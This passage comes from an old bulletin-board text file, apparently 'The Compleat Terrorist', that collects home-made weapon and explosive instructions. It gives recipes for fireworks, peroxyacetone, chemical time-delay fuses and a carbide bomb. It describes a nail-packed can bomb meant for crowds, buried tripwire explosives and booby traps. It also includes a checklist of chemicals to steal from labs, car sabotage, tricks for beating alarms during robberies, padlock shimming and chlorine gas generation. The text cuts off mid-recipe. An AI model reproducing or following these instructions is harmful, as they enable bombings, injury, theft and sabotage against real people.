   satisfactory, I would put it in the firecracker.

8) If this type of firecracker is mounted on a rocket engine, professional to
    semi-professional displays can be produced.


7.42     SKYROCKETS

     An impressive home made skyrocket can easily be made in the home from
model rocket engines.  Estes engines are recommended.

1) Buy an Estes Model Rocket Engine of the desired size, remembering that
   the power doubles with each letter.  (See sect. 6.1 for details)

2) Either buy a section of body tube for model rockets that exactly fits the
   engine, or make a tube from several thicknesses of paper and glue.

3) Scrape out the clay backing on the back of the engine, so that the powder
   is exposed.  Glue the tube to the engine, so that the tube covers at least
   half the engine.  Pour a small charge of flash powder in the tube, about
   1/2 an inch.

4) By adding materials as detailed in the section on firecrackers, various
   types of effects can be produced.

5) By putting Jumping Jacks or bottle rockets without the stick in the tube,
   spectacular displays with moving fireballs or M.R.V.'s can be produced.

     6) Finally, by mounting many home made firecrackers on the tube with the
       fuses in the tube, multiple colored bursts can be made.


7.43     ROMAN CANDLES

     Roman candles are impressive to watch.  They are relatively difficult to
make, compared to the other types of home-made fireworks, but they are well
worth the trouble.

1) Buy a 1/2 inch thick model rocket body tube, and reinforce it with several
   layers of paper and/or masking tape.  This must be done to prevent the tube
   from exploding.  Cut the tube into about 10 inch lengths.

2) Put the tube on a sheet of wax paper, and seal one end with epoxy and the
   drying agent.  About 1/2 of an inch is sufficient.

3) Put a hole in the tube just above the bottom layer of epoxy, and insert a
   desired length of water proof fuse.  Make sure that the fuse fits tightly.

4) Pour about 1 inch of pyrodex or gunpowder down the open end of the tube.

5) Make a ball by powdering about two 6 inch sparklers of the desired color.
   Mix this powder with a small amount of flash powder and a small amount of
   pyrodex, to have a final ratio (by volume) of 60% sparkler material / 20%
   flash powder / 20% pyrodex.  After mixing the powders well, add water, one
   drop at a time, and mixing continuously, until a damp paste is formed.

   This paste should be moldable by hand, and should retain its shape when
   left alone. Make a ball out of the paste that just fits into the tube.
   Allow the ball to dry.

6) When it is dry, drop the ball down the tube.  It should slide down fairly
   easily.  Put a small wad of tissue paper in the tube, and pack it gently
   against the ball with a pencil.

7) When ready to use, put the candle in a hole in the ground, pointed in a
   safe direction, light the fuse, and run.  If the device works, a colored
   fireball should shoot out of the tube to a height of about 30 feet.  This
   height can be increased by adding a slightly larger powder charge in step
   4, or by using a slightly longer tube.

8) If the ball does not ignite, add slightly more pyrodex in step 5.

9) The balls made for roman candles also function very well in rockets,
   producing an effect of falling colored fireballs.


8.0     LISTS OF SUPPLIERS AND MORE INFORMATION

     Most, if not all, of the information in this publication can be obtained
through a public or university library.  There are also many publications that
are put out by people who want to make money by telling other people how to
make explosives at home.  Adds for such appear frequently in paramilitary
magazines and newspapers.  This list is presented to show the large number of
places that information and materials can be purchased from.   It also
includes fireworks companies and the like.


COMPANY NAME AND ADDRESS               WHAT COMPANY SELLS
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ               ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
 FULL AUTO CO. INC.                     EXPLOSIVE RECIPES,
 P.O. BOX 1881                          PAPER TUBING
 MURFREESBORO, TN
 37133

 UNLIMITED                              CHEMICALS AND FUSE
 BOX 1378-SN
 HERMISTON, OREGON
 97838

 AMERICAN FIREWORKS NEWS                FIREWORKS NEWS MAGAZINE WITH
 SR BOX 30                              SOURCES AND TECHNIQUES
 DINGMAN'S FERRY, PENNSYLVANIA 18328

 BARNETT INTERNATIONAL INC.             BOWS, CROSSBOWS, ARCHERY MATERIALS,
 125 RUNNELS STREET                     AIR RIFLES
 P.O. BOX 226
 PORT HURON, MICHIGAN 48060

 CROSSMAN AIR GUNS                      AIR GUNS
 P.O. BOX 22927
 ROCHESTER, NEW YORK
 14692

 R. ALLEN                               PROFESSIONAL FIREWORKS CONSTRUCTION
 P.O. BOX 146                           BOOKS & FORMULAS
 WILLOW GROVE, PA 19090

 MJ DISTRIBUTING                        FIREWORKS FORMULAS
 P.O. BOX 10585
 YAKIMA,WA   98909

 EXECUTIVE PROTECTION PRODUCTS INC.     TEAR GAS GRENADES,
 316 CALIFORNIA AVE.                    PROTECTION DEVICES
 RENO, NEVADA
 89509


 COMPANY NAME AND ADDRESS               WHAT COMPANY SELLS
 ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ               ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
 BADGER FIREWORKS CO. INC.              CLASS "B" AND "C" FIREWORKS  BOX 1451
 JANESVILLE, WISCONSIN
 53547

 NEW ENGLAND FIREWORKS CO. INC.         CLASS "C" FIREWORKS  P.O. BOX 3504
 STAMFORD, CONNECTICUTT
 06095

 RAINBOW TRAIL                          CLASS "C" FIREWORKS  BOX 581
 EDGEMONT, PENNSYLVANIA 19028

 STONINGTON FIREWORKS INC.              CLASS "C" AND "B" FIREWORKS  4010 NEW
 WILSEY BAY U.25 ROAD
 RAPID RIVER, MICHIGAN 49878

 WINDY CITY FIREWORKS INC.              CLASS "C" AND "B" FIREWORKS
 P.O. BOX 11                            (GOOD PRICES!)
 ROCHESTER, INDIANA 46975

BOOKS
ÄÄÄÄÄ
THE ANARCHIST'S COOKBOOK           (highly inaccurate)

THE IMPROVISED MUNITIONS MANUAL    (formulas work, but put maker at risk)

MILITARY EXPLOSIVES


   Two manuals of interest:  Duponts "Blaster's Handbook", a $20 manual mainly
useful for rock and seismographic operations.  Atlas's "Powder Manual" or
"Manual of Rock Blasting" (I forget the title, it's in the office).  This is a
$60 book, well worth the cash, dealing with the above two topics, plus
demolitions, and non-quarry blasting.

9.0     CHECKLIST FOR RAIDS ON LABS

     In the end, the serious terrorist would probably realize that if he/she
wishes to make a truly useful explosive, he or she will have to steal the
chemicals to make the explosive from a lab.  A list of such chemicals in order
of priority would probably resemble the following:

     LIQUIDS                    SOLIDS
     _______                    ______

     ____     Nitric Acid        ____    Potassium Perchlorate
     ____     Sulfuric Acid      ____    Potassium Chlorate
     ____     95% Ethanol        ____    Picric Acid (usually a powder)
     ____     Toluene            ____    Ammonium Nitrate
     ____     Perchloric Acid    ____    Powdered Magnesium
     ____     Hydrochloric Acid  ____    Powdered Aluminum
                                 ____    Potassium Permanganate
     GASES                       ____    Sulfur (flowers of)
     _______                     ____    Mercury
                                 ____    Potassium Nitrate
     ____     Hydrogen           ____    Potassium Hydroxide
     ____     Oxygen             ____    Phosphorus
     ____     Chlorine           ____    Sodium Azide
     ____     Carbon Dioxide     ____    Lead Acetate
                                 ____    Barium Nitrate

10.0     USEFUL PYROCHEMISTRY

     In general, it is possible to make many chemicals from just a few basic
ones.  A list of useful chemical reactions is presented.  It assumes knowledge
of general chemistry; any individual who does not understand the following
reactions would merely have to read the first five chapters of a high school
chemistry book.


1.  potassium perchlorate from perchloric acid and potassium hydroxide     
K(OH)       +     HClO     ---->     KClO     +    H O
    4                                    4          2

2.  potassium nitrate from nitric acid and potassium hydroxide
    "       +   HNO     ---->     KNO     +     "
                   3                 3

3.  ammonium perchlorate from perchloric acid and ammonium hydroxide
      NH OH     +     HClO     ---->     NH ClO     +     "
        3                 4                3   4
4.  ammonium nitrate from nitric acid and ammonium hydroxide
        NH OH   +     HNO     ---->     NH NO     +     "
          3             3                 3  3

5.  powdered aluminum from acids, aluminum foil, and magnesium

A.     aluminum foil    +    6HCl    ---->   2AlCl   +   3H                      
                                                3          2

B.     2AlCl  (aq)   +    3Mg    ---->  3MgCl (aq)   +  2Al
            3                                2

     The Al will be a very fine silvery powder at the bottom of the container
which must be filtered and dried. This same method works with nitric and
sulfuric acids, but these acids are too valuable in the production of high
explosives to use for such a purpose, unless they are available in great
excess.

11.0     ABOUT THE EDITOR

     The current editor is presently attending a small midwestern college. He
has never been convicted, tried or charged with a crime, and will never admit
to having commited any one of the 87 assorted misdemeanors and felonies (not
counting multiple counts, such as the 103 dry ice bombs) which one might
accuse him of. V.T.   (The EDITOR)

11.1     ABOUT THE AUTHOR

  While in high school, the original author became affiliated with CHAOS, and
eventually became the head of Gunzenbomz Pyro-Technologies.  At this time, at
age 18, he produced his first high explosive device, putting a 1 foot deep
crater in an associate's back yard. He had also produced many types of
rockets, explosive ammunition, and other pyrotechnic devices.

  While he was heading Gunzenbomz Pyro-Technologies, he was injured when a
home made device exploded in his hand; he did not make the device.  The author
learned, however, and  then decided to reform, and although he still
constructs an occasional explosive device, he chooses to abstain from their
production.

END OF PART 1 OF THE COMPLEAT TERRORIST


   WARNING: The second part of this book consists of untested and quite
           possibly DANGEROUS plans, formulas and information. Under NO
           circumstances should the reader even consider attempting to carry
           out any of the procedures outlined below.

                                               THE EDITOR  (V.T.)

PART 2 - Tennis ball cannons 
------   Information from the Usenet.  The Usenet is a worldwide network of      
         15,000 machines and over 500,000 people- And growing!

         Addendum by The Editor:   If you aren't in the Chicago area,
         check a local BBS list.  If you see a BBS which runs under UNIX,
         odds are it carries usenet.  The appropriate place to look is 
         rec.pyrotechnics.

At this time (twelve years ago) most soft drink cans were rolled tin rather
than the molded aluminum.  We would cut the tops and bottoms off of a  bunch
of them and tape them together with duct tape, forming a tube  of two feet or
more.

        At the end we would tape a can with the bottom  intact, more holes
punched (with a can opener) around the top, and a  small hole in the side at
the base. We then fastened this contraption to a tripod so we could aim it
reliably. Any object that came somewhat close to filling the tube was then
placed therein.

        In the shop, we used the clock as a target and an empty plastic
solder spool as ammunition, with tape over the ends of the center hole and
sometimes filled with washers for weight.  When taken to parties or picnics,
we would use whatever was handy.  Hot dog rolls or napkins filled with  potato
chips provided spectacular entertainment.
 
        Once loaded, a small amount of lighter fluid was poured into the hole
in  the side of the end can and allowed to vaporize for a few moments.  The
"fire control technician" would announce "Fire in the Hole" and ignite  it.
 
BOOM!  Whoosh!  The clock never worked after that! 
---------- 

    Our version of the potato chip cannon, originally designed around the
Pringles potato chip can, was built similarly.  Ours used coke cans, six with
the top and bottom removed, and the  seventh had Bottle opener holes all
around one end, the top of this can was covered with a grid or piece of wire
screening to keep the tennis ball from falling all the way to the bottom.
This was spiral  wrapped with at least two rolls of duct tape.

     A wooden shoulder rest  and forward hand grip was taped to the tube.  For
ignition we used  lantern batteries to a model-t coil, actuated by a push
button on  the hand grip.  A fresh wilson tennis ball was stuffed all the way
back to the grid, and a drop or two of lighter fluid was dropped in  one of
two holes in the end.  The ignition wire was poked through  the other hole.
 
    We would then lie in ambush, waiting for somthing to move.  When fired
with the proper air/fuel mixture, a satisfying thoomp!  At maximum range  the
ball would travel about 100 yards with a 45 degree launch angle.  Closer up
the ball would leave a welt on an warring opponent.  When  launched at a
moving car the thud as it hit the door would generally  rattle anyone inside.
Luckily we never completed the one that shot golf balls.

PART 4
                    More Fun Stuff for Terrorists

                             Carbide Bomb

This is EXTREMELY DANGEROUS. Exercise extreme caution.... Obtain some calcium
carbide. This is the stuff that is used in carbide lamps and can be found at
nearly any hardware store.
    Take a few pieces of this stuff (it looks like gravel) and put it in a
glass jar with some water. Put a lid on tightly. The carbide will react with
the water to produce acetylene carbonate which is similar to the gas used in
cutting torches.
    Eventually the glass with explode from internal pressure. If you leave a
burning rag nearby, you will get a nice fireball!
                      Auto Exhaust Flame Thrower

For this one, all you need is a car, a sparkplug, ignition wire and a switch.
Install the spark plug into the last four or five inches of the tailpipeby
drilling a hole that the plug can screw into easily. Attach the wire (this is
regular insulated wire) to one side of the switch and to the spark plug. The
other side of the switch is attached to the positive terminal on the battery.
With the car running, simply hit the switch and watch the flames fly!!! Again be
careful that no one is behind you! I have seen some of these flames go 20
feet!!!

PART 5- This is all various files I gleaned from BBS's.  (Added 8-23-90)
  
        Balloons are fun to play with in chem lab, fill them with the gas
that you get out of the taps on the lab desks, then tie up the  balloon
tight, and drop it out the window to the burnouts below, you  know, the ones
that are always smoking, they love to pop balloons with lit cigarette.... get
the picture? Good...
 
                             OPENING COMBO LOCKS

[ Touched up by V.T - The Editor ]

    First of all, let me tell you about the set-up of a lock.  When the lock
is locked, there is a curved piece of metal wedged inside the little notch on
the horseshoe shaped bar (known as the shackle) that is pushed in to the lock
when you lock it.

     To free this wedge, you usually have to turn the lock to the desired
combination and the pressure on the wedge is released therefore letting the
lock open.  I will now tell you how to make a pick so you can open a lock
without having to waste all that time turning the combination (this also helps
when you don't know the combination to begin with).

        To bypass this hassle, simply take a thinned hairpin (file it down) or
a opened out piece of a collapsing antenna (the inside diameter of the curved
piece of metal should be the same as the diameter of the shackle- if the metal
is too thick, use fine sandpaper to thin it down.

    Once you have your hair pin (make sure it's metal), take the ridged side
and break it off right before it starts to make a U-turn onto the straight
side.  The curved part  can now be used as a handle. Now, using a file, file
down the other end until it is fairly thin.  You should do this to many
hairpins and file them so they are of different thicknesses so you can jimmy
various locks.

  Look at a lock to see which side the lock opens from.  If you can't tell,
you will just have to try both sides.  When ya find out what side it opens
from, , take the lock pick and stick the filed end into the inside of the
horseshoe-shaped bar on whichever side the lock opens from.

     Now, put pressure on the handle of the lock pick (pushing down, into the
crack) and pull the lock up and down.  The lock will then open because the
pick separated the wedge and the notch allowing it to open.

  Also, this technique works best on American locks.  I have never picked a
Master lock before because of the shape a pressure of the wedge but if anyone
does it, let me know how long it took. Also, the Master lock casing is very
tight so ya can't get the shim in.

   PYROTECHNICAL DELIGHTS
                               WRITTEN BY RAGNER ROCKER

  Many of you out there probably have fantasies of revenge against teachers,
principals and other people who are justassholes.  depending on your level of
hatred of this person i would advise that you do some of these following
experiments:

  (1) Pouring dishsoap into the gas tank of your enemy- many of you already
know that gasoline + dishsoap(e.g.  joy, palmolive, etc.) form a mixture
called napalm.  now napalm is a jelly-like  substance used in bombs,
flamethrowers, etc.  now you can only guess what this mixture would do to
someone's fuel line!!!!

  (2) Spreading dirty motor oil/castor oil on someone's exhaust pipe- when
the exhaust pipe heats up(and it will!!)the motor oil or castor oil on the pipe
will cause thick, disgusting smoke to ooze forth from the back of that car.
Who knows maybe he/she might be pulled over and given a ticket!!

  (3) Light Bulb Bomb- see part one of the file

 (4) Simple smoke/stink bomb- you can purchaase sulphur at a drugstore under
the name flowers of sulphur.  now when sulphur burns it will give off a very
strong odor and plenty of smoke.  now all you need is a fuse from a
firecracker, a tin can, and the sulphur.  fill the can with sulphur(pack very
lightly), put aluninum foil over the top of the can, poke a small hole into
the foil, insert the wick, and light it and get out of the room if you value
your lungs.  you can find many uses for this( or at least i hope so.
 
                               FUN WITH ALARMS
 
    A fact I forgot to mention in my previous alarm articles is that one can
also use polyurethane foam in a can to silence horns and bells.  You can
purchase this at any hardware store as insulation.  it is easy to handle and
dries faster.

Many people that travel carry a pocket alarm with them.  this alarm is a small
device that is hung around the door knob, and when someone touches the knob his
body capacitance sets off the alarm.  these nasty nuisences can be found by
walking down the halls of a hotel and touching all the door knobs very quickly.
if you happen to chance upon one, attach a 3' length of wire or other metal
object to the knob.  this will cause the sleeping business pig inside to think
someone is breaking in and call room service for help.  all sorts of fun and
games will ensue.

    Some high-security instalations use keypads just like touch-tone pads (a
registered trade mark of bell systems) to open locks or disarm alarms.  most
use three or four digits.  to figure out the code, wipe the key-pad free from
all fingerprints by using a rag soaked in rubbing alcohol.  after the keypad
has been used just apply finger print dust and all four digits will be marked.
now all you have to do is figure out the order. if you want to have some fun
with a keypad, try pressing the * and # at the same time.  many units use this
as a panic button. This will bring the owner and the cops running and ever-one
will have a good time.  never try to remove these panels from the wall, as
they have built-in tamper switches.
 
    On the subject of holdups, most places (including supermarkets, liqour
stores, etc.) have what is known as a money clip.  these little nasties are
placed at the bottom of a money drawer and when the last few bills are
with-drawn a switch closes and sets the alarm off.  that's why when you make
your withdrawl it's best to help yourself so you can check for these little
nasties.  if you find them, merely insert ones underneath the pile of
twenties, and then pull out the twenties, leaving the one-dollar bill behind
to prevent the circuit from closing.

   SOFT DRINK CAN BOMB  AN ARTICLE FROM THE BOOK:

  THE POOR MAN'S JAMES BOND    BY KURT SAXON
 
 This is an anti-personnel bomb meant for milling crowds.  the bottom of a
soft drink can is half cut out and bent back.  a giant firecracker or other
explosive is put in and surrounded with nuts and bolts or rocks.  the fuse is
then armed with a chemical delay in a plastic drinking straw.

      ! !                            After first making sure there are no
      ! !                           children nearby, the acid or glycerine
      ! ! <-CHEMICAL INGITER        is put into the straw and the can is set
   ---- ----                        down by a tree or wall where it will not
   !  !1!  !                        be knocked over.  the delay should give
   ! ===== !                        you three to five minutes.  it will then
   !* ! ! "!                        have a shattering effect on passersby.
   !  ! !  !
   !  ! !  !<- BIG FIRECRACKER
   !  ! !% !
   !  ==== !
   !       !
   !   #   !                          It is hardly likely that anyone would
   !  ---  !                         pick up and drink from someone else's
   !   !   !     <- NUTS & BOLTS     soft drink can.  but if such a crude
   !   /   !                         person should try to drink from your
   !       !                         bomb he would break a nasty habit
   ---------                         fast!


                  Pyro Book ][   by Capt Hack  and Grey Wolf
 
TIME DELAYED CHEMICAL FUSE
 
1) Put 1 teaspoon full of of potassium permanganate in a tin can.
2) add a few drops of glycerine
3) wait 3-4 min.
4) get the hell out..  the stuff will smoke, then burst into flame..

** potasium permanganate stains like iodine but worse [it's purple]
** the reaction will spatter a bit ->it can be messy...
** it doesn't matter if the amounts are uneven [ie.  1 part to 3 parts]

 
EXPLOSIVES AND INCENDIARIES by THE RESEARCHER

INTRODUCTION: The trouble with text books on chemistry and explosives is the
attitude with which they are written.  They don't say, "Now I know you would
like to blow holy hell out of something just for the fun of it so here is how
to whip up something in your kitchen to do it".  They tell you how Dupont does
it or how the anchient Chinese did it but not how you can do it with the
resourses and materials available to you.

 Even army manuals on field expedient explosives are almost useless because
they are just outlines written with the understanding that an instructor is
going to fill in the blanks.  It is a fun game to search out the materials
that can be put together to make something go "boom".  You can find what you
need in grocery stores, hardware stores, and farm supplies.  An interesting
point to remember is that it is much easier to make a big e explosion than a
small one.  It is very difficult for a home experimenter to make a
firecracker, but a bomb capable of blowing the walls out of a building is
easy.

                           HOW TO MAKE ROCKET FUEL

   This is easy to make and fun to play with.  Mix equal parts by volume
Potassium or Sodium Nitrate and granulated sugar.  Pour a big spoonful of
this into a pile. Stick a piece of blackmatch fuse into it; light; and step
back.  This is also a very hot incendiary.  A little imagination will suggest
a lot of experiments for this.

                             ANOTHER ROCKET FUEL

 Mix equal parts by volume of zinc dust and sulfur.  Watch out if you
experiment with this.  It goes off in a sudden flash.  It is not a powerful
explosive, but is violent stuff even when not confined because of its fast
burning rate.

  --- As I continue from this point some of the ingredients are going to be
harder to get without going through a chemical supply.  I try to avoid this.
I happen to know that B. Prieser Scientific (local to my area) has been
instructed by the police to send them the names of anyone buying chemicals in
certain combinations.  For example, if a person were to buy Sulfuric acid,
Nitric acid and Toluene (the makings for TNT) in one order the police would be
notified.  I will do the best I can to tell you how to make the things you
need from commonly available materials, but I don't want to leave out
something really good because you might have to scrounge for an ingredient.  I
am guessing you would prefer it that way.


                 HOW TO MAKE AN EXPLOSIVE FROM COMMON MATCHES

  Pinch the head near the bottom with a pair of wire cutters to break it up;
then use the edges of the cutters to scrape off the loose material.  It gets
easy with practice.  You can do this while watching TV and collect enough for
a bomb without dying of boredom.
    Once you have a good batch of it, you can load it into a pipe instead of
black powder.  Be careful not to get any in the threads, and wipe off any that
gets on the end of the pipe.  Never try to use this stuff for rocket fuel.  A
science teacher was killed that way.
      Just for fun while I'm on the subject of matches, did you know that you
can strike a safety match on a window pane? Hold a paper match between your
thumb and first finger.  With your second finger, press the head firmly
against a large window.  Very quickly, rub the match down the pane about 2
feet while maintaining the pressure.  The friction will generate enough heat
to light the match.

  Another fun trick is the match rocket.  Tightly wrap the top half of a paper
match with foil.  Set it in the top of a pop bottle at a 45 degree angle.
Hold a lighted match under the head until it ignites.  If you got it right,
the match will zip up and hit the ceiling.

 I just remembered the match guns I used to make when I was a kid.  These are
made from a bicycle spoke.  At one end of the spoke is a piece that screws
off.  Take it off and screw it on backwards.  You now have a piece of stiff
wire with a small hollow tube on one end.  Pack the material from a couple of
wooden safety matches into the tube.  Force the stem of a match into the hole.
It sould fit very tightly.  Hold a lighted match under the tube until it gets
hot enough to ignite the powder.  It goes off with a bang.


           HOW TO MAKE CONCENTRATED SULFURIC ACID FROM BATTERY ACID

 Go to an auto supply store and ask for "a small battery acid".  This should
only cost a few dollars.  What you will get is about a gallon of dilute
sulfuric acid.  Put a pint of this into a heat resistant glass container.  The
glass pitchers used for making coffee are perfect. Do not use a metal container.

  Use an extension cord to set up a hotplate out doors.  Boil the acid until
white fumes appear.  As soon as you see the white fumes, turn off the hot
plate and let the acid cool.  Pour the now concentrated acid into a glass
container.  The container must have a glass stopper or plastic cap -- no
metal.  It must be air tight.  Otherwize, the acid will quickly absorb
moisture from the air and become diluted.  Want to know how to make a time
bomb that doesn't tick and has no wires or batteries? Hold on to your acid and
follow me into the next installment.

                   HOW TO MAKE A CHEMICAL TIME DELAY FUSE:

    To get an understanding of how this is going to work, mix up equal parts
by volume Potassium chlorate and granulated sugar.  Pour a spoonful of the
mixture in a small pile and make a depression in the top with the end of a
spoon.  Using a medicine dropper, place one drop of concentrated sulfuric acid
in the depression and step back.
     It will snap and crackle a few times and then burst into vigorous flames.
To make the fuse, cut about 2 inches off a plastic drinking straw.  Tamp a
small piece of cotton in one end.  On top of this put about an inch of the
clorate/sugar mixture.
    Now lightly tamp in about a quarter inch of either glass wool or asbestos
fibers.  Secure this with the open end up and drop in 3 or 4 drops of sulfuric
acid.  After a few minutes the acid will soak through the fibers and ignite
the mixture.
    The time delay can be controled by the amount of fiber used and by varying
how tightly it is packed.  Don't use cotton for this.  The acid will react
with cotton and become weakened in the process.  By punching a hole in the
side of the straw, a piece of blackmatch or other fuse can be inserted and
used to set off the device of your choice.

     Potassium chlorate was very popular with the radical underground.  It can
be used to make a wide variety of explosives and incendiaries, some of them
extremely dangerous to handle.  The radicals lost several people that way.
But, don't worry.  I am not going to try to protect you from yourself.  I have
decided to tell all.  I will have more to say about Potassium chlorate, but
for now, let's look at a couple of interesting electric fuses.


                                PEROXYACETONE

 PEROXYACETONE IS EXTREMELY FLAMMABLE AND HAS BEEN REPORTED TO BE SHOCK
 SENSITIVE.

MATERIALS-
 4ML ACETONE
 4ML 30% HYDROGEN PEROXIDE
 4 DROPS CONC.  HYDROCHLORIC ACID
 150MM TEST TUBE

Add 4ml acetone and 4ml hydrogen peroxide to the test tube.  then add 4 drops
concentrated hydrochloric acid. In 10-20 minutes a white solid should begin to
appear. if no change is observed, warm the test tube in a water bath at 40
celsius. Allow the reaction to continue for two hours.  Swirl the slurry and
filter it. Leave out on filter paper to dry for at least two hours.  To
ignite, light a candle tied to a meter stick and light it (while staying at
least a meter away) .

I would like to give credit to a book by shakashari entitled "Chemical
demonstrations" for a few of the precise amounts of chemicals in some
experiments.
                    ...ZAPHOD BEEBLEBROX/MPG!


THE CHEMIST'S CORNER #2:    HOUSEHOLD CHEMICALS, BY ZAPHOD BEEBLEBROX/MPG

 This article deals with instructions on how to do some interesting
experiments with common household chemicals.  Some may or may not work
depending on the concentration of certain chemicals in different areas and
brands.  I would suggest that the person doing these experiments have some
knowledge of chemistry, especially for the more dangerous experiments.

 I am not responsible for any injury or damage caused by people using this
information.  It is provided for use by people knowledgable in chemistry who
are interested in such experiments and can safely handle such experiments.

I.  A LIST OF HOUSEHOLD CHEMICALS AND THEIR COMPOSITION

VINEGAR: 3-5% ACETIC ACID              BAKING SODA: SODIUM BICARBONATE
DRAIN CLEANERS: SODIUM HYDROXIDE       SANI-FLUSH: 75% SODIUM BISULFATE
AMMONIA WATER: AMMONIUM HYDROXIDE      CITRUS FRUIT: CITRIC ACID
TABLE SALT: SODIUM CHLORIDE            SUGAR: SUCROSE
MILK OF MAGNESIA-MAGNESIUM HYDROXIDE   TINCTURE OF IODINE- 4% IODINE
RUBBING ALCOHOL- 70 OR 99% (DEPENDS ON BRAND) ISOPROPYL ALCOHOL (DO NOT DRINK!)


                           GENERATING CHLORINE GAS

 This is slightly more dangerous than the other two experiments, so you
shouild know what you're doing before you try this...

 Ever wonder why ammonia bottles always say 'do not mix with chlorine bleach',
and visa-versa? That's because if you mix ammonia water with ajax or something
like it, it will give off chlorine gas. To capture it, get a large bottle and
put ajax in the bottom.  then pour some ammonia down into the bottle.  since
the c hlorine is heavier than air, it will stay down in there unless you use
large amounts of either ajax or ammonia (don't!).


                            CHLORINE + TURPENTINE

 Take a small cloth or rag and soak it in turpentine. Quickly drop it into the
bottle of chlorine. It should give off a lot of black smoke and probably start
burning...

                           GENERATING HYDROGEN GAS

 To generate hydrogen, all you need is an acid and a metal that will react
with that acid.  Try vinegar (acetic acid) with zinc, aluminum, magnesium,
etc.  You can collect hydrogen in something if you note that it is lighter
than air....  light a small amount and it burns with a small *pop*.

  Another way of creating hydrogen is by the electrolysis of water.  this
involve sseperating water (H2O) into hydrogen and oxygen by an electric
current. To do this, you need a 6-12 volt battery (or a DC transformer), two
test tubes, a large bowl, two carbon electrodes (take them out of an unworking
6-12 volt battery), and table salt. Dissolve the salt in a large bowl full of
water. Submerge the two test tubes in the water and put the electrodes inside
them, with the mouth of the tube aiming down.  Connect the battery to some
wire going down to the electrodes.

   This will work for a while, but chlorine will be generated along with the
oxygen which will corrode your copper wires leading to the carbon
electrodes...  (the table salt is broken up into chlorine and sodium ions, the
chlorine comes off as a gas with oxygen while sodium reacts with the water to
form sodium hydroxide....).  therefore, if you can get your hands on some
sulfuric acid, use it instead.  it will not affect the reaction other than
making the water conduct electricity.

WARNING:  DO NOT use a transformer that outputs AC current! Not only is AC
         inherently more dangerous than DC, it also produces both Hydrogen and
         Oxygen at each electrode.


                             HYRDOGEN + CHLORINE

 Take the test tube of hydrogen and cover the mouth with your thumb. Keep it
inverted, and bring it near the bottle of chlorine (not one that has reacted
with turpentine).  Say "goodbye test tube", and drop it into the bottle.  The
hydrogen and chlorine should react and possibly explode (depending on purity
and amount of each gas).  An interesting thing about this is they will not
react if it is dark and no heat or other energy is around. When a light is
turned on, enough energy is present to cause them to react...

                            PREPARATION OF OXYGEN

    Get some hydrogen peroxide (from a drug store) and manganese dioxide (from
a battery- it's a black powder).  Mix the two in a bottle, and they give off
oxygen. If the bottle is stoppered, pressure will build up and shoot it off.

     Try lighting a wood splint and sticking it (when only glowing) into the
bottle. The oxygen will make it burst into flame. The oxygen will allow things
to burn better...

                                    IODINE

   Tincture of iodine contains mainly alcohol and a little iodine.  To
seperate them, put the tincture of iodine in a metal lid to a bottle and heat
it over a candle.  Have a stand holding another metal lid directly over the
tincture (about 4-6 inches above it) with ice on top of it.  The alcohol
should evaporate, and the iodine should sublime, but should reform iodine
crystals on the cold metal lid directly above.  If this works (I haven't
tried), you can use the iodine along with household ammonia to form nitrogen
triiodide.
                                            ...ZAPHOD BEEBLEBROX/MPG!

   I have found that Pool Chlorine tablets with strong household ammonia react
to produce LOTS of chlorine gas and heat... also mixing the tablets with
rubbing alcohol produces heat, a different (and highly flammable) gas, and
possibly some sort of acid (it eats away at just about anything it touches)

                                        David Richards


                                  TRIPWIRES
         by The Mortician

    Well first of all I reccommend that you read the file on my board about
landmines...  If you can't then here is the concept.

  You can use an m-80,h-100, blockbuster or any other type of explosive that
will light with a fuse. Now the way this works is if you have a 9 volt
battery, get either a solar igniter (preferably) or some steel wool you can
create a remote ignition system.  What you do it set up a schematic like this.

  ------------------>+ batery
 steel ||          ->- batery
 wool ||            /
 :==:--- <--fuse    \
  ||                /
  ---- spst switch--\

   So when the switch is on the currnet will flow through the steel wool or
igniter and heat up causing the fuse to light.
  Note: For use with steel wool try it first and get a really thin piece of
wire and pump the current through it to make sure it will heat up to light the
explosive.

   Now the thing to do is plant your explosive wherever you want it to be,bury
it and cover the wires.  Now take a fishing line (about 20 lb. test) and tie
one end to a secure object.  Have your switch secured to something and make a
loop on the other end on the line. Put the loop around the switch such that
when pulled it will pull the switch and set off the explosive.

   To ignite the explosive...  The thing to do is to experiment with this and
find your best method...  Let me know on any good kills, or new techniques...
On my board... (201)376-4462


  BOOBY TRAP TRIP WIRES......      BY Vlad Tepes (of Chgo C64 fame)

   Here is a method for constructing boobytraps which I personally invented,
and which I have found to work better than any other type of release booby
trap.

    There are many possible variations on this design, but the basic premise
remains the same. What you'll need:

  3-4 nails each 2 inches long and soft enough to
      bend easily (galvanized iron works well)
    6 feet of wire or fishing line
 5-15 feet of strong string or rope
    1 really sick mind.

    Hammer two of the nails into the trunk of a tree (about one inch apart) so
they form a horizontal line. They should be angled slightly upward, about 30
degrees.

    Bend each nail Downward about one inch out from the trunk. Take your
nefarious device (say a small rock suspended in a tree) and rig a rope or
string so the line comes DOWN towards the two nails. Tie a loop in the string
so the loop *just* reaches between the two nails, and pass a third nail
between the two nails with the loop around this nail between the two others
(see diagrams)

      bent nails
     /                        || ^ slight upward tension
# /\                          ||
#/                         @  ||    @         ( @ are the two nails, head on)
#                  ------!----()------
#          trip wire
 \                     /
Trunk                 third nail

    Now tie one end of the fishing line to the head of the third nail, and the
other end around another tree or to a nail (in another tree, a root or a
stump etc).

    When somebody pulls on the trip wire, the nail will be pulled out and your
sick creation will be released to do it's damage (try tying it to a firing
pin).

  There are several possible variations. More than one trip wire can be
attached to the same nail, or this device can be used to arm a second trip
wire. Large wire staples or hook and eye loops can be used to replace the two
bent nails.

     A more interesting variation uses a straight piece of metal rod with a
hole at each end, or with a short wire loop welded to each end. One end is
attached to the tripwire, the other is attached to a spring.

               ||
*/\/\/\/\/\-===()=======--------------------------------------*
  SPRING     BOLT            Trip wire

    With this design the loop will be released if the tripwire is pulled or if
it is broken. The spring should be under moderate tension and well oiled.


                            Improvised Explosives
Gelatine Explosive from Anti-Freeze         Written by: The Lich

CAUTION: THIS FORMULA ASSUMES THAT THE MAKER HAS NO QUALMS ABOUT KILLING
         HIS/HER SELF IN THE PROCESS.

 This explosive is almost the same as the nitro-gelatin plastique explosive
